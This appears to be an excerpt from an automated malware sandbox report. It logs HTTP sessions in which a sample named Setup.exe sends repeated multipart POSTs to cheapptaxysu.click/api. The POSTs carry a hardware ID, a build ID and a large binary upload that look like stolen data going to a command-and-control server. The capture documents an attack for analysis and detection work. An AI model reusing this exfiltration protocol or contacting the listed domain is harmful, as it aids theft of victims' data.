                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8731
                                                                                                                                      Host: cheapptaxysu.click
                                                                                                                                      2024-12-30 20:29:25 UTC8731OUTData Raw: 2d 2d 43 34 57 59 37 43 53 58 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 37 33 43 33 31 34 35 35 32 32 43 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 43 34 57 59 37 43 53 58 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 34 57 59 37 43 53 58 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 43 34 57 59 37 43 53 58 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                      Data Ascii: --C4WY7CSX22Content-Disposition: form-data; name="hwid"22773C3145522CFCBEBA0C6A975F1733--C4WY7CSX22Content-Disposition: form-data; name="pid"2--C4WY7CSX22Content-Disposition: form-data; name="lid"CZJvss----C4WY7CSX22Content-Dispo
                                                                                                                                      2024-12-30 20:29:26 UTC1133INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 30 Dec 2024 20:29:26 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=tapvgratijnna1u5ijb8vjhlj4; expires=Fri, 25 Apr 2025 14:16:04 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cjE6NOqvgw2HpoNJHeuf%2BPmsBIXmwII2NrvZiVWNkpRmykOjorEUeiFHxiWoF%2BnWLAcGE9uM3sdMlk4vQUNNtPsavc%2F74wFg9V2S1Pokunkud6pSEIbM4urMqeM7i36Qor%2FEf%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fa4c82beac26a4e-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1675&rtt_var=661&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9753&delivery_rate=1616832&cwnd=202&unsent_bytes=0&cid=77bc56dcd1a5775b&ts=506&x=0"
                                                                                                                                      2024-12-30 20:29:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-30 20:29:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.449743172.67.177.884437412C:\Users\user\Desktop\Setup.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 20:29:27 UTC374OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=648SJEUVLL7PBB71KXJ
                                                                                                                                      Cookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/api
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20438
                                                                                                                                      Host: cheapptaxysu.click
                                                                                                                                      2024-12-30 20:29:27 UTC15331OUTData Raw: 2d 2d 36 34 38 53 4a 45 55 56 4c 4c 37 50 42 42 37 31 4b 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 37 33 43 33 31 34 35 35 32 32 43 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 34 38 53 4a 45 55 56 4c 4c 37 50 42 42 37 31 4b 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 34 38 53 4a 45 55 56 4c 4c 37 50 42 42 37 31 4b 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a
                                                                                                                                      Data Ascii: --648SJEUVLL7PBB71KXJContent-Disposition: form-data; name="hwid"22773C3145522CFCBEBA0C6A975F1733--648SJEUVLL7PBB71KXJContent-Disposition: form-data; name="pid"3--648SJEUVLL7PBB71KXJContent-Disposition: form-data; name="lid"CZJvss--
                                                                                                                                      2024-12-30 20:29:27 UTC5107OUTData Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
                                                                                                                                      Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                      2024-12-30 20:29:28 UTC1132INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 30 Dec 2024 20:29:28 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=661tfd2i5e1p9msnbci1hmudt7; expires=Fri, 25 Apr 2025 14:16:06 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZN8qM2X3hOHHIEmmRl2ho%2F3Z%2BHOWpscsm6KFVf8gjsVNjgASHrjtriSa6DRONOHREhOWZXQFGTV%2FmqbtAekqBnedpCJCzju7xbnYH1HMuU7pUk3T4bY7MFHp4uNI97VRiJkVBiw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fa4c834b87f43d9-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1632&rtt_var=618&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21492&delivery_rate=1763285&cwnd=221&unsent_bytes=0&cid=258e3a2aafa092a5&ts=1865&x=0"
                                                                                                                                      2024-12-30 20:29:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-30 20:29:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.449744172.67.177.884437412C:\Users\user\Desktop\Setup.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 20:29:29 UTC369OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=S8VNT2VMZNYLV0P
                                                                                                                                      Cookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/api
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1232
                                                                                                                                      Host: cheapptaxysu.click
                                                                                                                                      2024-12-30 20:29:29 UTC1232OUTData Raw: 2d 2d 53 38 56 4e 54 32 56 4d 5a 4e 59 4c 56 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 37 33 43 33 31 34 35 35 32 32 43 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 53 38 56 4e 54 32 56 4d 5a 4e 59 4c 56 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 38 56 4e 54 32 56 4d 5a 4e 59 4c 56 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 53 38 56 4e 54 32 56 4d 5a 4e
                                                                                                                                      Data Ascii: --S8VNT2VMZNYLV0PContent-Disposition: form-data; name="hwid"22773C3145522CFCBEBA0C6A975F1733--S8VNT2VMZNYLV0PContent-Disposition: form-data; name="pid"1--S8VNT2VMZNYLV0PContent-Disposition: form-data; name="lid"CZJvss----S8VNT2VMZN
                                                                                                                                      2024-12-30 20:29:30 UTC1128INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 30 Dec 2024 20:29:30 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=j2m1ja724djn3qihb9b4c28psv; expires=Fri, 25 Apr 2025 14:16:09 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8wWEMbo49cSovfOqAEF111IY0JdQX2Pfim0sB6qSSs%2BpMfJXMbcGyxh%2Fcf0wFvoByERnWfqmBqVHcCMpdwzcUs3G3N3WkT7dmwkOgZL9PN8MS4ny%2BLin7goxAjXPOdqDtcfCVQU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fa4c84578e88c21-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2029&rtt_var=780&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2237&delivery_rate=1386514&cwnd=242&unsent_bytes=0&cid=a814598f118f1731&ts=487&x=0"
                                                                                                                                      2024-12-30 20:29:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-30 20:29:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.449745172.67.177.884437412C:\Users\user\Desktop\Setup.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 20:29:31 UTC365OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=7LP70VPPU
                                                                                                                                      Cookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/api
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 570584
                                                                                                                                      Host: cheapptaxysu.click
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: 2d 2d 37 4c 50 37 30 56 50 50 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 37 33 43 33 31 34 35 35 32 32 43 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 37 4c 50 37 30 56 50 50 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 4c 50 37 30 56 50 50 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 37 4c 50 37 30 56 50 50 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                      Data Ascii: --7LP70VPPUContent-Disposition: form-data; name="hwid"22773C3145522CFCBEBA0C6A975F1733--7LP70VPPUContent-Disposition: form-data; name="pid"1--7LP70VPPUContent-Disposition: form-data; name="lid"CZJvss----7LP70VPPUContent-Dispositi
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: e1 77 93 5d 44 c0 19 75 2c 8c e3 62 d7 ac d1 a1 8a db 57 f7 73 dd b6 83 d4 20 c7 ff b7 4a 49 f3 01 ba fd ae e0 0e 1a d4 93 c9 3d 41 c0 6b 0b 07 0b d0 14 9c d3 c2 c2 4b cc d8 3d 69 a5 02 10 ef cf 05 a3 d4 63 0c de 82 a1 6d 9b 25 c4 38 24 d5 2b 0c 2e 25 a6 39 b8 e1 40 83 3c 2f c0 18 1d b3 3d c3 a1 04 92 53 81 a9 db f9 45 9a 34 bf cd cf c9 61 0f bf 18 31 45 3b a5 bc 1c b9 50 f4 88 71 fc ab c5 29 15 de b4 56 1c b5 c2 54 56 63 08 96 e9 29 42 6c 00 ef 47 51 31 a6 e0 02 86 45 49 d9 6a f0 77 91 e7 d4 3a 12 b9 a4 15 f9 2a fe 31 e3 f1 55 3b 09 2a 99 91 8e 85 25 96 35 67 de 2d 01 bf 3d 34 6d 74 a0 20 f8 d1 8f 66 6f 1e 19 09 54 89 5f bb 79 34 0f 45 ad 8f 8e 78 ae fe 7c ab 21 a4 0d b7 a9 4e 5c f8 90 a0 89 7f 88 da 2a 14 49 3a c3 c0 90 dd 3e 3e 7b 6e 71 52 f7 32 e2 1c
                                                                                                                                      Data Ascii: w]Du,bWs JI=AkK=icm%8$+.%9@</=SE4a1E;Pq)VTVc)BlGQ1EIjw:*1U;*%5g-=4mt foT_y4Ex|!N\*I:>>{nqR2
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: 16 8a 44 b0 97 04 ed d4 03 5c c7 0b 04 15 29 33 0c f6 4a 45 96 98 ae 65 3e 1a 36 15 a3 55 c6 a7 9f 55 ae 4b 86 08 10 f7 74 bf cb 6f a2 9b 4c c1 42 31 5a aa 0f f1 72 85 2f 34 66 3f 14 8a 8c ed 9e 34 04 3e 48 f4 9b 3a a5 08 c4 04 95 5c 53 8a d1 41 f7 0c 86 0b cd 7e 31 9a 1e ec 58 a7 97 58 ec ef 3c cf 94 44 87 0b f2 f6 d5 d3 ff 52 75 fd 1e 47 61 18 94 71 e6 e6 8c fc 56 df 1c b3 e4 0c 48 23 fc ce 57 e4 e6 ba 19 44 b8 d6 8e 50 ad ef 0f 90 f7 74 5d 8f a0 5c 39 c3 75 79 83 87 46 5f cd 4f 7d 17 bb 5c f9 57 d0 cf 16 8d cd 78 6f 17 c8 47 13 ce 3c 41 c6 dc c1 dc 7d b0 78 29 26 2b 4f ed 4e 3c 9b d4 7a 90 7c 81 d1 b0 70 82 dd a8 9b 27 11 c6 4c ad 29 fb 50 1a 8a f1 d1 ec 45 78 d9 bc b0 f1 c3 b5 03 17 0a 1f 8d 1c e2 28 d1 14 47 47 22 bf ba 69 41 4a 83 11 b3 f1 79 f1 9a
                                                                                                                                      Data Ascii: D\)3JEe>6UUKtoLB1Zr/4f?4>H:\SA~1XX<DRuGaqVH#WDPt]\9uyF_O}\WxoG<A}x)&+ON<z|p'L)PEx(GG"iAJy
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: 60 a8 bf ef 7e 3c f2 8a e9 d2 17 9c 81 3a d0 32 df bc ef d1 3a e1 6a b8 52 6a 8a b7 75 30 ca 7f 77 6d ea 2f 82 6e 8a a0 f8 8b d8 01 5f 70 c6 e6 bf a2 c9 d1 eb 1d 75 46 39 4b 13 cd 56 db 4b 45 1f 9d 78 c9 d1 f2 bb 4b 6a 3e 71 cd 76 ce 87 5f 2f bc f7 df cb 90 1d 16 bc 43 71 fb 80 ee 45 7e 7e c8 91 7e 40 f8 af 96 92 ba b9 c9 b9 48 75 0d 5d b2 fb 78 a3 37 6a 49 e4 26 da e3 9e 6b 92 50 52 83 9e a0 99 0b 18 6b 53 63 2a 75 7b 0b 82 6b 4b b0 f3 28 75 f3 b8 0c 9d 30 b8 e5 77 e7 e4 e7 6e 1c b3 a7 fd 68 49 da c2 23 ca de ee f6 8f 73 a9 95 3f 38 06 71 16 14 d9 ab cd 77 79 8a 17 cf d1 fc ca 5a fb c9 9f 76 cf f0 f4 5b fe 54 3d e8 f6 ea 83 ad 1a c5 a2 b4 79 ac d8 51 fb 93 ff 12 db ab c3 af e7 3b 68 09 79 50 24 63 56 93 1c 64 ee 0a 7b 21 17 34 d7 6b fe 2d f4 8f 27 5c 06
                                                                                                                                      Data Ascii: `~<:2:jRju0wm/n_puF9KVKExKj>qv_/CqE~~~@Hu]x7jI&kPRkSc*u{kK(u0wnhI#s?8qwyZv[T=yQ;hyP$cVd{!4k-'\
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: ea 88 05 c7 26 78 bf b3 8b bc d8 ee 9d 3d ad 4c b7 87 dc 66 cd ca bc 27 7f 8f 95 64 c0 ab 02 37 ab 33 5c 73 21 de 32 a2 17 61 30 c7 05 7f 98 31 b8 b9 17 21 04 8c 26 72 a1 3a 22 d0 7b 7d 86 8f 38 38 ae 66 b3 03 79 1e 4a 6f 88 fa 5f 99 b4 45 06 05 dc f6 9a 74 2a ba 8f 04 1f ee 65 36 f1 80 21 8a e3 a8 b5 aa 0b 46 78 e7 dd fb 4f 87 df 6b 9b fa 6b 49 3a dc 3f 22 69 73 4f e5 bd b2 39 29 dd 0f fd f7 01 ad 69 e1 64 c2 0a c4 f0 4f a4 f2 fd ff 5f c9 0d 49 50 3a c6 03 e7 81 c5 3f 03 97 64 16 df 08 31 aa ca 29 29 2d c8 62 f8 f3 62 c9 a3 22 1e 0e c2 79 aa fd 13 67 47 38 e1 bb 44 59 56 82 20 e2 cf f6 74 a0 a2 fd 0c 49 ac 35 48 0d dc 8a d2 a6 1e fa b8 ef 21 eb c1 4d ce 79 1d 42 fb 99 e8 ed 98 06 aa 22 91 ef 3b b8 54 c2 03 4b 17 f5 c9 7d c7 d8 4d 22 f6 94 73 45 00 9a 03
                                                                                                                                      Data Ascii: &x=Lf'd73\s!2a01!&r:"{}88fyJo_Et*e6!FxOkkI:?"isO9)idO_IP:?d1))-bb"ygG8DYV tI5H!MyB";TK}M"sE
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: 42 17 7b 42 81 dc b3 a8 42 52 a3 81 81 af c0 8f 83 2d 81 54 75 e5 56 6f ed da 04 28 de 7b db e7 59 9a 16 32 b0 60 fb d5 8e 5a 11 6b 19 46 00 62 57 ad 33 4a 39 5c 9f 63 db c5 31 a5 5f 08 03 82 6e 8c dd e3 eb b9 7f e4 ee d6 a4 53 bd 62 77 91 b3 47 5b b2 50 89 4a b4 a1 98 fd 78 df e5 8f 46 36 df f4 3d 0b 04 0d 35 9a c2 b6 f8 c2 4e b7 f1 15 e7 1b ce 3a c6 f6 56 6c 3f f8 11 64 f8 43 e8 9c b3 ec af ba c4 67 d0 ef 12 6c 6e 65 22 86 00 1e 0c 15 d0 5b db 06 e5 6d b9 3f 5c 21 e1 6c 44 ef 20 6e fd 16 bd e0 a8 ce e1 2d 7d dc 21 8e 3f 6a 62 eb 28 bd c8 cc 80 64 58 25 c9 88 de a7 a6 3e ab 27 8f 09 81 7d 7e 54 87 f4 4f 31 cf 83 fc ab 18 39 42 cc f1 fb 3c 60 61 a7 9d dd d6 be 8b 42 37 12 5d d0 7a a1 08 72 c3 ae a8 7b 6a 1a 3f 70 8a 63 fd 8e ea ac 3b 68 cd 81 a0 8f e8 06
                                                                                                                                      Data Ascii: B{BBR-TuVo({Y2`ZkFbW3J9\c1_nSbwG[PJxF6=5N:Vl?dCglne"[m?\!lD n-}!?jb(dX%>'}~TO19B<`aB7]zr{j?pc;h
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: b5 05 c6 e9 f6 7d 43 e2 dd b9 6f 55 59 c3 12 4d b0 0b a7 4a 90 91 82 20 0f 1d 58 5d 9a 91 94 c6 09 42 6e a0 ce 6d a6 20 75 37 1b 36 51 ee 70 ab ea a1 e8 8f 8b 80 b0 ea 1d 04 6e e1 64 66 33 27 38 50 25 ff db b2 57 36 3e 7a c9 80 6b 77 96 87 64 bd 4c fd eb 5f 1f 3f 42 fe d8 19 9f 0d 24 88 f7 de c0 2d e2 90 e5 b7 1c d3 dc e7 4a e2 ab f1 8a 56 b4 24 c6 fa cf 4c 7c e4 93 cd d0 14 44 f2 6d 16 66 73 dc 96 34 94 50 a0 8d 84 9b 0f 58 91 26 e8 ac dc 59 2d fd 36 1f cd fa 19 25 7a 13 0d 70 9b ab 3f d3 58 3e 43 08 fa b5 d1 a5 c7 39 f7 02 99 ec 00 e7 ea 1f d7 a2 1c 7a c1 62 8d 10 b8 ba 31 5a f2 b1 46 7a b4 52 a9 6f b3 12 a6 3e 06 20 ba 94 fe 8e 03 78 94 7d 94 ce 79 0a e5 dd 25 3f 33 f8 50 70 7e 3f c0 c5 c1 b1 37 c1 47 eb 94 c2 92 fd 01 fe a0 a4 e2 40 e1 1c 0d 86 03 1e
                                                                                                                                      Data Ascii: }CoUYMJ X]Bnm u76Qpndf3'8P%W6>zkwdL_?B$-JV$L|Dmfs4PX&Y-6%zp?X>C9zb1ZFzRo> x}y%?3Pp~?7G@
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: 85 74 c5 d7 e4 04 4f 53 d8 b4 1e 2e 93 ea a2 72 df 4d db 5c 0c c3 c0 04 b2 33 df af f6 ff b6 a7 b5 e8 65 fe 48 d8 04 3c 07 e6 9e a3 60 d9 f9 33 e3 2f b0 30 1f 8e 77 51 1a db 39 3e 31 e7 ca b6 1f 88 34 20 6a a3 cc c4 fa 8a 6e d8 d7 ba 28 a5 cf 8d a7 98 5d 50 bc a4 94 61 30 a7 de e6 1a 6b 5f 43 94 0f d5 bb 24 18 4f e6 07 bc 02 eb b1 55 47 5d eb 3b cd 9a c6 f7 87 38 4a 05 20 31 ab 7c 45 bd f4 07 9e fe 24 ec f5 7d 8b de 50 32 b2 3b 35 ae a5 86 f7 44 34 d0 6c 3e 0d 7e 2b 5f d5 2f f1 e4 bc 28 7b 70 7c 58 a2 df 69 d3 f9 5f c4 13 4a e1 fe a9 fa ab 02 a4 40 8f 18 c6 b0 51 7e 4f 49 c0 35 af a5 cd 2f 89 78 52 ad a9 5c fa cf eb b4 b3 7a 43 cd b4 39 c4 52 01 cc eb a6 ea 8e 0f 74 c7 b4 b1 89 62 ee 6d ce 69 e7 f4 ba f7 f4 07 eb 36 9f 00 64 af db 91 f3 23 fb d0 55 26 e2
                                                                                                                                      Data Ascii: tOS.rM\3eH<`3/0wQ9>14 jn(]Pa0k_C$OUG];8J 1|E$}P2;5D4l>~+_/({p|Xi_J@Q~OI5/xR\zC9Rtbmi6d#U&
                                                                                                                                      2024-12-30 20:29:31 UTC15331OUTData Raw: 02 db cd 1c 66 a4 c0 d5 dd a6 f2 10 29 1e 0e 42 96 09 67 58 ba 8f 26 c3 af c9 bc 18 bb 20 89 25 4e f1 75 fc 4a f0 5b 10 6e 25 20 22 dd fc 3c e6 1f a8 70 e7 f6 54 a8 77 3a 74 2c 41 96 d9 b8 4e 13 c1 ef 92 85 df 01 94 db 50 52 ec d6 c1 e7 21 44 fc 0d c6 c5 64 db d9 ee a2 61 3d b6 8c b0 90 1b f7 e0 b5 d1 02 e1 28 95 4e c0 9d 98 0b 3f 4a 80 b5 0c 7f cd 31 39 af 74 da 1a a2 25 44 85 20 e5 8d 40 1d aa 30 41 84 4e d8 77 a9 fe 01 c4 0f f1 f1 0b 4a 7c ab 39 f0 28 56 fe e9 27 70 a0 f7 6b 53 3e ca ac 21 58 82 f3 06 a4 3f 09 56 45 d0 82 5d 63 1a 5f 3c 19 54 77 c8 6f 0f e0 9b 4d ca 23 f3 f3 cd 6e d1 a3 c2 04 85 99 da cb c2 7c df aa 3f cb 33 b4 f9 e9 54 b6 4b 15 91 49 a4 a4 3d 09 62 e2 75 d3 e3 78 74 0c e4 e5 c3 d2 ca 8d 51 a6 91 30 1f aa c0 66 40 56 b9 3a 96 b3 64 e4
                                                                                                                                      Data Ascii: f)BgX& %NuJ[n% "<pTw:t,ANPR!Dda=(N?J19t%D @0ANwJ|9(V'pkS>!X?VE]c_<TwoM#n|?3TKI=buxtQ0f@V:d
